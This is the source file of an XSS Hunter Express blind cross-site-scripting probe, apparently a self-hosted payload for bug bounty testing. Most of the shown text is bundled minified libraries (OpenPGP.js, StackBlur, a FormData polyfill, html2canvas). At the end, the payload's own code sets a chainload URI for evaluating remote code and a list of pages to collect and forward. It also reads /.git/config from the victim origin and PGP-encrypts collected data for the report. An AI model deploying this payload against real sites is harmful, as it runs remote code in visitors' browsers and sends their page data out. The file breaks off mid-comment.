xsshunter/probe.js

/*
$$$$$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$\
\_$$ _|$$$\ $$$ |$$ __$$\ $$ __$$\ $$ __$$\\__$$ __|$$ __$$\ $$$\ $$ |\__$$ __|$$ |
$$ | $$$$\ $$$$ |$$ | $$ |$$ / $$ |$$ | $$ | $$ | $$ / $$ |$$$$\ $$ | $$ | $$ |
$$ | $$\$$\$$ $$ |$$$$$$$ |$$ | $$ |$$$$$$$ | $$ | $$$$$$$$ |$$ $$\$$ | $$ | $$ |
$$ | $$ \$$$ $$ |$$ ____/ $$ | $$ |$$ __$$< $$ | $$ __$$ |$$ \$$$$ | $$ | \__|
$$ | $$ |\$ /$$ |$$ | $$ | $$ |$$ | $$ | $$ | $$ | $$ |$$ |\$$$ | $$ |
$$$$$$\ $$ | \_/ $$ |$$ | $$$$$$ |$$ | $$ | $$ | $$ | $$ |$$ | \$$ | $$ | $$\
\______|\__| \__|\__| \______/ \__| \__| \__| \__| \__|\__| \__| \__| \__|
$$$$$$$\ $$\ $$$$$$$\ $$\
$$ __$$\ $$ | $$ __$$\ $$ |
$$ | $$ |$$ | $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ | $$$$$$\ $$$$$$\ $$$$$$$ |
$$$$$$$ |$$ |$$ __$$\ \____$$\ $$ _____|$$ __$$\ $$$$$$$ |$$ __$$\ \____$$\ $$ __$$ |
$$ ____/ $$ |$$$$$$$$ | $$$$$$$ |\$$$$$$\ $$$$$$$$ | $$ __$$< $$$$$$$$ | $$$$$$$ |$$ / $$ |
$$ | $$ |$$ ____|$$ __$$ | \____$$\ $$ ____| $$ | $$ |$$ ____|$$ __$$ |$$ | $$ |
$$ | $$ |\$$$$$$$\ \$$$$$$$ |$$$$$$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$\ \$$$$$$$ |\$$$$$$$ |
\__| \__| \_______| \_______|\_______/ \_______| \__| \__| \_______| \_______| \_______|
This is a payload to test for Cross-site Scripting (XSS). It is meant to be used by security professionals and bug bounty hunters.
This is a self-hosted instance of XSS Hunter Express. It is not the same as the XSS Hunter website.
*/
// GPG encryption https://openpgpjs.org/
/*! OpenPGP.js v5.5.0 - 2022-08-31 - this is LGPL licensed code, see LICENSE/our website https://openpgpjs.org/ for more information. */
var openpgp=function(e){"use strict";const t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},r=Symbol("doneWritingPromise"),i=Symbol("doneWritingResolve"),n=Symbol("doneWritingReject"),a=Symbol("readingIndex");class s extends Array{constructor(){super(),this[r]=new Promise(((e,t)=>{this[i]=e,this[n]=t})),this[r].catch((()=>{}))}}function o(e){return e&&e.getReader&&Array.isArray(e)}function c(e){if(!o(e)){const t=e.getWriter(),r=t.releaseLock;return t.releaseLock=()=>{t.closed.catch((function(){})),r.call(t)},t}this.stream=e}s.prototype.getReader=function(){return void 0===this[a]&&(this[a]=0),{read:async()=>(await this[r],this[a]===this.length?{value:void 0,done:!0}:{value:this[this[a]++],done:!1})}},s.prototype.readToEnd=async function(e){await this[r];const t=e(this.slice(this[a]));return this.length=0,t},s.prototype.clone=function(){const e=new s;return e[r]=this[r].then((()=>{e.push(...this)})),e},c.prototype.write=async function(e){this.stream.push(e)},c.prototype.close=async function(){this.stream[i]()},c.prototype.abort=async function(e){return this.stream[n](e),e},c.prototype.releaseLock=function(){};const u="object"==typeof t.process&&"object"==typeof t.process.versions,h=u&&void 0;function f(e){return o(e)?"array":t.ReadableStream&&t.ReadableStream.prototype.isPrototypeOf(e)?"web":A&&A.prototype.isPrototypeOf(e)?"ponyfill":h&&h.prototype.isPrototypeOf(e)?"node":!(!e||!e.getReader)&&"web-like"}function d(e){return Uint8Array.prototype.isPrototypeOf(e)}function l(e){if(1===e.length)return e[0];let t=0;for(let r=0;r<e.length;r++){if(!d(e[r]))throw Error("concatUint8Array: Data must be in the form of a Uint8Array");t+=e[r].length}const r=new Uint8Array(t);let i=0;return e.forEach((function(e){r.set(e,i),i+=e.length})),r}const p=u&&void 0,y=u&&void 0;let b,m;if(y){b=function(e){let t=!1;return new A({start(r){e.pause(),e.on("data",(i=>{t||(p.isBuffer(i)&&(i=new 
Uint8Array(i.buffer,i.byteOffset,i.byteLength)),r.enqueue(i),e.pause())})),e.on("end",(()=>{t||r.close()})),e.on("error",(e=>r.error(e)))},pull(){e.resume()},cancel(r){t=!0,e.destroy(r)}})};class e extends y{constructor(e,t){super(t),this._reader=D(e)}async _read(e){try{for(;;){const{done:e,value:t}=await this._reader.read();if(e){this.push(null);break}if(!this.push(t)||this._cancelling){this._reading=!1;break}}}catch(e){this.emit("error",e)}}_destroy(e){this._reader.cancel(e)}}m=function(t,r){return new e(t,r)}}const g=new WeakSet,w=Symbol("externalBuffer");function v(e){if(this.stream=e,e[w]&&(this[w]=e[w].slice()),o(e)){const t=e.getReader();return this._read=t.read.bind(t),this._releaseLock=()=>{},void(this._cancel=()=>{})}let t=f(e);if("node"===t&&(e=b(e)),t){const t=e.getReader();return this._read=t.read.bind(t),this._releaseLock=()=>{t.closed.catch((function(){})),t.releaseLock()},void(this._cancel=t.cancel.bind(t))}let r=!1;this._read=async()=>r||g.has(e)?{value:void 0,done:!0}:(r=!0,{value:e,done:!1}),this._releaseLock=()=>{if(r)try{g.add(e)}catch(e){}}}v.prototype.read=async function(){if(this[w]&&this[w].length){return{done:!1,value:this[w].shift()}}return this._read()},v.prototype.releaseLock=function(){this[w]&&(this.stream[w]=this[w]),this._releaseLock()},v.prototype.cancel=function(e){return this._cancel(e)},v.prototype.readLine=async function(){let e,t=[];for(;!e;){let{done:r,value:i}=await this.read();if(i+="",r)return t.length?K(t):void 0;const n=i.indexOf("\n")+1;n&&(e=K(t.concat(i.substr(0,n))),t=[]),n!==i.length&&t.push(i.substr(n))}return this.unshift(...t),e},v.prototype.readByte=async function(){const{done:e,value:t}=await this.read();if(e)return;const r=t[0];return this.unshift(j(t,1)),r},v.prototype.readBytes=async function(e){const t=[];let r=0;for(;;){const{done:i,value:n}=await this.read();if(i)return t.length?K(t):void 0;if(t.push(n),r+=n.length,r>=e){const r=K(t);return this.unshift(j(r,e)),j(r,0,e)}}},v.prototype.peekBytes=async 
function(e){const t=await this.readBytes(e);return this.unshift(t),t},v.prototype.unshift=function(...e){this[w]||(this[w]=[]),1===e.length&&d(e[0]
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */function gd(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+t+" is not a constructor or null");function r(){this.constructor=e}md(e,t),e.prototype=null===t?Object.create(t):(r.prototype=t.prototype,new r)}function wd(e){if(!e)throw new TypeError("Assertion failed")}function vd(){}function _d(e){return"object"==typeof e&&null!==e||"function"==typeof e}function kd(e){if("function"!=typeof e)return!1;var t=!1;try{new e({start:function(){t=!0}})}catch(e){}return t}function Ad(e){return!!_d(e)&&"function"==typeof e.getReader}function Sd(e){return!!_d(e)&&"function"==typeof e.getWriter}function Ed(e){return!!_d(e)&&(!!Ad(e.readable)&&!!Sd(e.writable))}function Pd(e){try{return e.getReader({mode:"byob"}).releaseLock(),!0}catch(e){return!1}}function xd(e,t){var r=(void 0===t?{}:t).type;return wd(Ad(e)),wd(!1===e.locked),"bytes"===(r=Md(r))?new Rd(e):new Kd(e)}function Md(e){var t=e+"";if("bytes"===t)return t;if(void 0===e)return e;throw new RangeError("Invalid type is specified")}var Cd=function(){function e(e){this._underlyingReader=void 0,this._readerMode=void 0,this._readableStreamController=void 0,this._pendingRead=void 0,this._underlyingStream=e,this._attachDefaultReader()}return e.prototype.start=function(e){this._readableStreamController=e},e.prototype.cancel=function(e){return wd(void 0!==this._underlyingReader),this._underlyingReader.cancel(e)},e.prototype._attachDefaultReader=function(){if("default"!==this._readerMode){this._detachReader();var e=this._underlyingStream.getReader();this._readerMode="default",this._attachReader(e)}},e.prototype._attachReader=function(e){var t=this;wd(void 0===this._underlyingReader),this._underlyingReader=e;var r=this._underlyingReader.closed;r&&r.then((function(){return 
t._finishPendingRead()})).then((function(){e===t._underlyingReader&&t._readableStreamController.close()}),(function(r){e===t._underlyingReader&&t._readableStreamController.error(r)})).catch(vd)},e.prototype._detachReader=function(){void 0!==this._underlyingReader&&(this._underlyingReader.releaseLock(),this._underlyingReader=void 0,this._readerMode=void 0)},e.prototype._pullWithDefaultReader=function(){var e=this;this._attachDefaultReader();var t=this._underlyingReader.read().then((function(t){var r=e._readableStreamController;t.done?e._tryClose():r.enqueue(t.value)}));return this._setPendingRead(t),t},e.prototype._tryClose=function(){try{this._readableStreamController.close()}catch(e){}},e.prototype._setPendingRead=function(e){var t,r=this,i=function(){r._pendingRead===t&&(r._pendingRead=void 0)};this._pendingRead=t=e.then(i,i)},e.prototype._finishPendingRead=function(){var e=this;if(this._pendingRead){var t=function(){return e._finishPendingRead()};return this._pendingRead.then(t,t)}},e}(),Kd=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return gd(t,e),t.prototype.pull=function(){return this._pullWithDefaultReader()},t}(Cd);function Dd(e){return new Uint8Array(e.buffer,e.byteOffset,e.byteLength)}var Rd=function(e){function t(t){var r=this,i=Pd(t);return(r=e.call(this,t)||this)._supportsByob=i,r}return gd(t,e),Object.defineProperty(t.prototype,"type",{get:function(){return"bytes"},enumerable:!1,configurable:!0}),t.prototype._attachByobReader=function(){if("byob"!==this._readerMode){wd(this._supportsByob),this._detachReader();var e=this._underlyingStream.getReader({mode:"byob"});this._readerMode="byob",this._attachReader(e)}},t.prototype.pull=function(){if(this._supportsByob){var e=this._readableStreamController.byobRequest;if(e)return this._pullWithByobRequest(e)}return this._pullWithDefaultReader()},t.prototype._pullWithByobRequest=function(e){var t=this;this._attachByobReader();var r=new 
Uint8Array(e.view.byteLength),i=this._underlyingReader.read(r).then((function(r){var i,n,a;t._readableStreamController,r.done?(t._tryClose(),e.respond(0)):(i=r.value,n=e.view,a=Dd(i),Dd(n).set(a,0),e.respond(r.value.byteLength))}));return this._setPendingRead(i),i},t}(Cd);function Ud(e){wd(Sd(e))
//# sourceMappingURL=openpgp.min.js.map
// Blur canvas https://github.com/flozz/StackBlur
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).StackBlur={})}(this,(function(t){"use strict";function e(t){return(e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var r=[512,512,456,512,328,456,335,512,405,328,271,456,388,335,292,512,454,405,364,328,298,271,496,456,420,388,360,335,312,292,273,512,482,454,428,405,383,364,345,328,312,298,284,271,259,496,475,456,437,420,404,388,374,360,347,335,323,312,302,292,282,273,265,512,497,482,468,454,441,428,417,405,394,383,373,364,354,345,337,328,320,312,305,298,291,284,278,271,265,259,507,496,485,475,465,456,446,437,428,420,412,404,396,388,381,374,367,360,354,347,341,335,329,323,318,312,307,302,297,292,287,282,278,273,269,265,261,512,505,497,489,482,475,468,461,454,447,441,435,428,422,417,411,405,399,394,389,383,378,373,368,364,359,354,350,345,341,337,332,328,324,320,316,312,309,305,301,298,294,291,287,284,281,278,274,271,268,265,262,259,257,507,501,496,491,485,480,475,470,465,460,456,451,446,442,437,433,428,424,420,416,412,408,404,400,396,392,388,385,381,377,374,370,367,363,360,357,354,350,347,344,341,338,335,332,329,326,323,320,318,315,312,310,307,304,302,299,297,294,292,289,287,285,282,280,278,275,273,271,269,267,265,263,261,259],n=[9,11,12,13,13,14,14,15,15,15,15,16,16,16,16,17,17,17,17,17,17,17,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23
,23,23,23,23,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24];function a(t,r,n,a,o){if("string"==typeof t&&(t=document.getElementById(t)),!t||"object"!==e(t)||!("getContext"in t))throw new TypeError("Expecting canvas with `getContext` method in processCanvasRGB(A) calls!");var i=t.getContext("2d");try{return i.getImageData(r,n,a,o)}catch(t){throw new Error("unable to access image data: "+t)}}function o(t,e,r,n,o,f){if(!(isNaN(f)||f<1)){f|=0;var g=a(t,e,r,n,o);g=i(g,e,r,n,o,f),t.getContext("2d").putImageData(g,e,r)}}function i(t,e,a,o,i,f){for(var g,l=t.data,c=2*f+1,s=o-1,v=i-1,b=f+1,x=b*(b+1)/2,d=new u,y=d,h=1;h<c;h++)y=y.next=new u,h===b&&(g=y);y.next=d;for(var p=null,m=null,w=0,B=0,C=r[f],E=n[f],I=0;I<i;I++){y=d;for(var S=l[B],N=l[B+1],R=l[B+2],D=l[B+3],G=0;G<b;G++)y.r=S,y.g=N,y.b=R,y.a=D,y=y.next;for(var T=0,j=0,A=0,W=0,k=b*S,H=b*N,_=b*R,M=b*D,O=x*S,P=x*N,q=x*R,z=x*D,F=1;F<b;F++){var J=B+((s<F?s:F)<<2),K=l[J],L=l[J+1],Q=l[J+2],U=l[J+3],V=b-F;O+=(y.r=K)*V,P+=(y.g=L)*V,q+=(y.b=Q)*V,z+=(y.a=U)*V,T+=K,j+=L,A+=Q,W+=U,y=y.next}p=d,m=g;for(var X=0;X<o;X++){var Y=z*C>>E;if(l[B+3]=Y,0!==Y){var Z=255/Y;l[B]=(O*C>>E)*Z,l[B+1]=(P*C>>E)*Z,l[B+2]=(q*C>>E)*Z}else l[B]=l[B+1]=l[B+2]=0;O-=k,P-=H,q-=_,z-=M,k-=p.r,H-=p.g,_-=p.b,M-=p.a;var $=X+f+1;$=w+($<s?$:s)<<2,O+=T+=p.r=l[$],P+=j+=p.g=l[$+1],q+=A+=p.b=l[$+2],z+=W+=p.a=l[$+3],p=p.next;var tt=m,et=tt.r,rt=tt.g,nt=tt.b,at=tt.a;k+=et,H+=rt,_+=nt,M+=at,T-=et,j-=rt,A-=nt,W-=at,m=m.next,B+=4}w+=o}for(var ot=0;ot<o;ot++){var it=l[B=ot<<2],ft=l[B+1],gt=l[B+2],ut=l[B+3],lt=b*it,ct=b*ft,st=b*gt,vt=b*ut,bt=x*it,xt=x*ft,dt=x*gt,yt=x*ut;y=d;for(var ht=0;ht<b;ht++)y.r=it,y.g=ft,y.b=gt,y.a=ut,y=y.next;for(var pt=o,mt=0,wt=0,Bt=0,Ct=0,Et=1;Et<=f;Et++){B=pt+ot<<2;var 
It=b-Et;bt+=(y.r=it=l[B])*It,xt+=(y.g=ft=l[B+1])*It,dt+=(y.b=gt=l[B+2])*It,yt+=(y.a=ut=l[B+3])*It,Ct+=it,mt+=ft,wt+=gt,Bt+=ut,y=y.next,Et<v&&(pt+=o)}B=ot,p=d,m=g;for(var St=0;
//# sourceMappingURL=stackblur.min.js.map
// FormData polyfill https://github.com/jimmywarting/FormData
if("undefined"!=typeof Blob&&("undefined"==typeof FormData||!FormData.prototype.keys)){const e="object"==typeof globalThis?globalThis:"object"==typeof window?window:"object"==typeof self?self:this,t=e.FormData,n=e.XMLHttpRequest&&e.XMLHttpRequest.prototype.send,o=e.Request&&e.fetch,a=e.navigator&&e.navigator.sendBeacon,s=e.Element&&e.Element.prototype,r=e.Symbol&&Symbol.toStringTag;r&&(Blob.prototype[r]||(Blob.prototype[r]="Blob"),"File"in e&&!File.prototype[r]&&(File.prototype[r]="File"));try{new File([],"")}catch(t){e.File=function(e,t,n){const o=new Blob(e,n),a=n&&void 0!==n.lastModified?new Date(n.lastModified):new Date;return Object.defineProperties(o,{name:{value:t},lastModifiedDate:{value:a},lastModified:{value:+a},toString:{value:()=>"[object File]"}}),r&&Object.defineProperty(o,r,{value:"File"}),o}}function normalizeValue([e,t,n]){return t instanceof Blob&&(t=new File([t],n,{type:t.type,lastModified:t.lastModified})),[e,t]}function ensureArgs(e,t){if(e.length<t)throw new TypeError(`${t} argument required, but only ${e.length} present.`)}function normalizeArgs(e,t,n){return t instanceof Blob?[String(e),t,void 0!==n?n+"":"string"==typeof t.name?t.name:"blob"]:[String(e),String(t)]}function normalizeLinefeeds(e){return e.replace(/\r\n/g,"\n").replace(/\n/g,"\r\n")}function each(e,t){for(let n=0;n<e.length;n++)t(e[n])}class i{constructor(e){this._data=[];const t=this;e&&each(e.elements,e=>{if(e.name&&!e.disabled&&"submit"!==e.type&&"button"!==e.type&&!e.matches("form fieldset[disabled] *"))if("file"===e.type){each(e.files&&e.files.length?e.files:[new File([],"",{type:"application/octet-stream"})],n=>{t.append(e.name,n)})}else if("select-multiple"===e.type||"select-one"===e.type)each(e.options,n=>{!n.disabled&&n.selected&&t.append(e.name,n.value)});else if("checkbox"===e.type||"radio"===e.type)e.checked&&t.append(e.name,e.value);else{const 
n="textarea"===e.type?normalizeLinefeeds(e.value):e.value;t.append(e.name,n)}})}append(e,t,n){ensureArgs(arguments,2),this._data.push(normalizeArgs(e,t,n))}delete(e){ensureArgs(arguments,1);const t=[];e=String(e),each(this._data,n=>{n[0]!==e&&t.push(n)}),this._data=t}*entries(){for(var e=0;e<this._data.length;e++)yield normalizeValue(this._data[e])}forEach(e,t){ensureArgs(arguments,1);for(const[n,o]of this)e.call(t,o,n,this)}get(e){ensureArgs(arguments,1);const t=this._data;e=String(e);for(let n=0;n<t.length;n++)if(t[n][0]===e)return normalizeValue(t[n])[1];return null}getAll(e){ensureArgs(arguments,1);const t=[];return e=String(e),each(this._data,n=>{n[0]===e&&t.push(normalizeValue(n)[1])}),t}has(e){ensureArgs(arguments,1),e=String(e);for(let t=0;t<this._data.length;t++)if(this._data[t][0]===e)return!0;return!1}*keys(){for(const[e]of this)yield e}set(e,t,n){ensureArgs(arguments,2),e=String(e);const o=[],a=normalizeArgs(e,t,n);let s=!0;each(this._data,t=>{t[0]===e?s&&(s=!o.push(a)):o.push(t)}),s&&o.push(a),this._data=o}*values(){for(const[,e]of this)yield e}_asNative(){const e=new t;for(const[t,n]of this)e.append(t,n);return e}_blob(){const e="----formdata-polyfill-"+Math.random(),t=[];for(const[n,o]of this)t.push(`--${e}\r\n`),o instanceof Blob?t.push(`Content-Disposition: form-data; name="${n}"; filename="${o.name}"\r\n`+`Content-Type: ${o.type||"application/octet-stream"}\r\n\r\n`,o,"\r\n"):t.push(`Content-Disposition: form-data; name="${n}"\r\n\r\n${o}\r\n`);return t.push(`--${e}--`),new Blob(t,{type:"multipart/form-data; boundary="+e})}[Symbol.iterator](){return this.entries()}toString(){return"[object FormData]"}}if(s&&!s.matches&&(s.matches=s.matchesSelector||s.mozMatchesSelector||s.msMatchesSelector||s.oMatchesSelector||s.webkitMatchesSelector||function(e){for(var t=(this.document||this.ownerDocument).querySelectorAll(e),n=t.length;--n>=0&&t.item(n)!==this;);return n>-1}),r&&(i.prototype[r]="FormData"),n){const 
t=e.XMLHttpRequest.prototype.setRequestHeader;e.XMLHttpRequest.prototype.setRequestHeader=function(e,n){t.call(this,e,n),"content-type"===e.toLowerCase()&&(this._hasContentType=!0)},e.XMLHttpRequest.prototype.send=function(e){if(e instanceof i){const t=e._blob();thi
// https://github.com/niklasvh/html2canvas
/*!
* html2canvas 1.4.1 <https://html2canvas.hertzen.com>
* Copyright (c) 2022 Niklas von Hertzen <https://hertzen.com>
* Released under MIT License
*/
!function(A,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(A="undefined"!=typeof globalThis?globalThis:A||self).html2canvas=e()}(this,function(){"use strict";
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
***************************************************************************** */var r=function(A,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(A,e){A.__proto__=e}||function(A,e){for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(A[t]=e[t])})(A,e)};function A(A,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function t(){this.constructor=A}r(A,e),A.prototype=null===e?Object.create(e):(t.prototype=e.prototype,new t)}var h=function(){return(h=Object.assign||function(A){for(var e,t=1,r=arguments.length;t<r;t++)for(var B in e=arguments[t])Object.prototype.hasOwnProperty.call(e,B)&&(A[B]=e[B]);return A}).apply(this,arguments)};function a(A,s,o,i){return new(o=o||Promise)(function(t,e){function r(A){try{n(i.next(A))}catch(A){e(A)}}function B(A){try{n(i.throw(A))}catch(A){e(A)}}function n(A){var e;A.done?t(A.value):((e=A.value)instanceof o?e:new o(function(A){A(e)})).then(r,B)}n((i=i.apply(A,s||[])).next())})}function H(t,r){var B,n,s,o={label:0,sent:function(){if(1&s[0])throw s[1];return s[1]},trys:[],ops:[]},A={next:e(0),throw:e(1),return:e(2)};return"function"==typeof Symbol&&(A[Symbol.iterator]=function(){return this}),A;function e(e){return function(A){return function(e){if(B)throw new TypeError("Generator is already executing.");for(;o;)try{if(B=1,n&&(s=2&e[0]?n.return:e[0]?n.throw||((s=n.return)&&s.call(n),0):n.next)&&!(s=s.call(n,e[1])).done)return s;switch(n=0,(e=s?[2&e[0],s.value]:e)[0]){case 0:case 1:s=e;break;case 4:return o.label++,{value:e[1],done:!1};case 5:o.label++,n=e[1],e=[0];continue;case 
7:e=o.ops.pop(),o.trys.pop();continue;default:if(!(s=0<(s=o.trys).length&&s[s.length-1])&&(6===e[0]||2===e[0])){o=0;continue}if(3===e[0]&&(!s||e[1]>s[0]&&e[1]<s[3])){o.label=e[1];break}if(6===e[0]&&o.label<s[1]){o.label=s[1],s=e;break}if(s&&o.label<s[2]){o.label=s[2],o.ops.push(e);break}s[2]&&o.ops.pop(),o.trys.pop();continue}e=r.call(t,o)}catch(A){e=[6,A],n=0}finally{B=s=0}if(5&e[0])throw e[1];return{value:e[0]?e[1]:void 0,done:!0}}([e,A])}}}function t(A,e,t){if(t||2===arguments.length)for(var r,B=0,n=e.length;B<n;B++)!r&&B in e||((r=r||Array.prototype.slice.call(e,0,B))[B]=e[B]);return A.concat(r||e)}var d=(B.prototype.add=function(A,e,t,r){return new B(this.left+A,this.top+e,this.width+t,this.height+r)},B.fromClientRect=function(A,e){return new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height)},B.fromDOMRectList=function(A,e){e=Array.from(e).find(function(A){return 0!==A.width});return e?new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height):B.EMPTY},B.EMPTY=new B(0,0,0,0),B);function B(A,e,t,r){this.left=A,this.top=e,this.width=t,this.height=r}for(var f=function(A,e){return d.fromClientRect(A,e.getBoundingClientRect())},Q=function(A){for(var e=[],t=0,r=A.length;t<r;){var B,n=A.charCodeAt(t++);55296<=n&&n<=56319&&t<r?56320==(64512&(B=A.charCodeAt(t++)))?e.push(((1023&n)<<10)+(1023&B)+65536):(e.push(n),t--):e.push(n)}return e},g=function(){for(var A=[],e=0;e<arguments.length;e++)A[e]=arguments[e];if(String.fromCodePoint)return String.fromCodePoint.apply(String,A);var t=A.length;if(!t)return"";for(var r=[],B=-1,n="";++B<t;){var s=A[B];s<=65535?r.push(s):(s-=65536,r.push(55296+(s>>10),s%1024+56320)),(B+1===t||16384<r.length)&&(n+=String.fromCharCode.apply(String,r),r.length=0)}return n},e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",n="undefined"==typeof Uint8Array?[]:new Uint8Array(256),s=0;s<e.length;s++)n[e.charCodeAt(s)]=s;for(var 
o="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",c="undefined"==typeof Uint8Array?[]:new Uint8Array(256),i=0;i<o.length;i++)c[o.charCodeAt(i)]=i;function w(A,e,t){return A.slice?A.slice(e,t):new Uint16Array(Array.prototype.slice.call(A,e,t))}var U=(l.prototype.get=function(A){var e;if(0<=A){if(A<55296||56319<A&&A<=65535)return e=this.index[A>>5],this.data[e=(e<<2)+(31&A)];if(A<=65535)return e=this.index[2048+(A-55296>>5)],this.data[e=(e<<2)+(31&A)];if(A<this.highStart)return e=this.index[e=2080+
// The bracketed tokens below are template slots, not real JavaScript values;
// presumably the server substitutes them before serving this file (confirm against the backend).
// chainload_uri: when non-empty, finishing_moves() passes it to eval_remote_source().
var chainload_uri = [CHAINLOAD_REPLACE_ME];
// collect_page_list: paths that collect_pages() requests on the current host and
// forwards through send_collected_page().
var collect_page_list = [COLLECT_PAGE_LIST_REPLACE_ME]
// Source: https://stackoverflow.com/a/20151856/1195812
/**
 * Decode a base64 string into a Blob, converting it in 1024-character slices.
 *
 * @param {string} base64Data - base64 text, without any "data:" URI prefix.
 * @param {string} [contentType] - MIME type given to the Blob; '' when omitted.
 * @returns {Blob} Blob holding the decoded bytes.
 */
function base64_to_blob(base64Data, contentType) {
    var mimeType = contentType || '';
    var CHUNK = 1024;
    // atob() yields one character per decoded byte.
    var decoded = atob(base64Data);
    var total = decoded.length;
    var parts = [];
    for (var start = 0; start < total; start += CHUNK) {
        var stop = Math.min(start + CHUNK, total);
        var chunk = new Uint8Array(stop - start);
        for (var pos = start; pos < stop; pos++) {
            chunk[pos - start] = decoded.charCodeAt(pos);
        }
        parts.push(chunk);
    }
    return new Blob(parts, { type: mimeType });
}
/**
 * Encrypt a text value to an armored OpenPGP public key using the bundled OpenPGP.js.
 *
 * @param {string} publicKeyArmored - ASCII-armored public key.
 * @param {string} data - text to encrypt.
 * @returns {Promise<*>} whatever openpgp.encrypt() resolves to; the original comment
 *   shows an armored '-----BEGIN PGP MESSAGE ...' block.
 */
let pgp_encrypt = async function(publicKeyArmored, data) {
    // put keys in backtick (``) to avoid errors caused by spaces or tabs
    const recipientKey = await openpgp.readKey({ armoredKey: publicKeyArmored });
    // openpgp.encrypt() takes its input as a Message object
    const plaintextMessage = await openpgp.createMessage({ text: data });
    const armoredCiphertext = await openpgp.encrypt({
        message: plaintextMessage,
        encryptionKeys: recipientKey,
    });
    return armoredCiphertext; // '-----BEGIN PGP MESSAGE ... END PGP MESSAGE-----'
};
/**
 * Issue a HEAD request to the empty URL (which resolves to the current document's
 * address) and report the Access-Control-Allow-Origin response header.
 *
 * @returns {Promise<string|false>} the header value, or false when the header is absent.
 */
let check_cors = async function(){
    const response = await fetch("", {method: 'HEAD'});
    // Each entry of the header iterator is a [name, value] pair.
    for (const [name, value] of response.headers){
        if (name.toLowerCase() === "access-control-allow-origin"){
            return value;
        }
    }
    return false;
}
/**
 * Request /.git/config from the current origin and report whether the response
 * looks like a git config file.
 *
 * A response body that starts with "[core]" is returned in full and ends up in the
 * report; a web server that refuses to serve dot-directories makes this return false.
 *
 * @returns {Promise<string|false>} the response body, or false when it does not start with "[core]".
 */
let check_git = async function(){
    const response = await fetch("/.git/config");
    const body = await response.text();
    return body.startsWith("[core]") ? body : false;
}
/**
 * Build a GUID-shaped identifier (8-4-4-4-12 lowercase hex digits).
 * The digits come from Math.random(), so the value is not cryptographically random.
 *
 * @returns {string}
 */
function get_guid() {
    // (1 + random) * 0x10000 is always a 5-digit hex number; dropping the leading
    // digit leaves exactly four hex digits.
    function hex4() {
        var n = Math.floor((1 + Math.random()) * 0x10000);
        return n.toString(16).slice(1);
    }
    var groups = [
        hex4() + hex4(),
        hex4(),
        hex4(),
        hex4(),
        hex4() + hex4() + hex4()
    ];
    return groups.join("-");
}
/**
 * Replace undefined with an empty string.
 * Despite the name, only undefined is replaced; null and every other value pass through unchanged.
 *
 * @param {*} value
 * @returns {*} '' when value is undefined, otherwise value itself.
